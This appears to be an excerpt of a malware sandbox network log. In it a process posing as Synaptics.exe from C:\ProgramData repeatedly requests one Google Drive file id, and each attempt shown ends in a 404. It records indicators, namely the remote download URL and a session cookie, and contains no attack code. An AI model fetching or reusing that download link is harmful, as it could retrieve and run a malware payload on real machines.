                                                                                                                                                      2024-12-30 10:25:35 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="RfLFD4D_t73s0bqfvi9Ibw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:35 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      18 | 192.168.2.11 | 49837 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:35 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:35 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:35 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-5UWSEc0hyd4trET6-ImPBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      19 | 192.168.2.11 | 49836 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:35 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:35 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC7IiSH-ZFQOfXH-hdLXVvGFZ1cZ7K_xQhoseuivSPzoJKXADovJ2aFVOdemTaDbO5bLjAivpWc
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:35 GMT
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-gC_pOnxkBAu0myri0oVNqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:35 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:35 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="n7FmyVulrDFhvyh8d559zw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:35 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      20 | 192.168.2.11 | 49845 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:36 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:36 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-OwZGobuvGq6gtr2S2MEmBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      21 | 192.168.2.11 | 49846 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:36 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:36 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC4us8661zgyagbC0mWLIzOODq9Rnn2OfJppFtOYC4Cmq4e0A_bOYITLxUi_2_7rLuwT
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:36 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-X6gpngfE8rqYpFEXyynOUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:36 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                      2024-12-30 10:25:36 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="s7JVvA76stXex42ehCKVDg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:36 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      22 | 192.168.2.11 | 49847 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:36 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:36 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-yPWsjUADV5KnXQfrEcT6DQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      23 | 192.168.2.11 | 49848 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:36 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:36 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC7kgc9wJ9U2CL61VRVan6sB3ulNEmlb1V0LsEdY_12fOLR3goH7TxYzqaxis1KdesDVZg_Rsks
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:36 GMT
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-xrzBVyYDrSGlJ749Z-dM7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:36 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:36 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="9pgXHaCIrcfOwHOjN--IWw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:36 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      24 | 192.168.2.11 | 49857 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:37 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
2024-12-30 10:25:37 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:37 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-c3MSzMbf-N3WkV1Y6OOAnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.11 | 49858 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:37 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
2024-12-30 10:25:37 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC4Svs1IQ44jLrISH8rJb7s8T4SlZWS-R13PXjaDXoCTOyaagM4RiCqx_muH0LCereMy
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:37 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-T-slwck-Ot-b1gTI18XrUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
2024-12-30 10:25:37 UTC | 147 | IN
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:37 UTC | 1390 | IN
                                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="TO7QSPckHkLAJt6RwFEZuA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:37 UTC | 115 | IN
                                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.11 | 49859 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:37 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
2024-12-30 10:25:37 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:37 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-wr2PSSVOFgWULq3GWWHNjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.11 | 49860 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:37 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
2024-12-30 10:25:37 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC4Bb3yM0F_BDOWSWHoUUjLfu9CJc5F4JIuIh4s1rr5LP0qgyB5hNw88zrYY3RxDOD8Yx45XDzQ
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:37 GMT
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
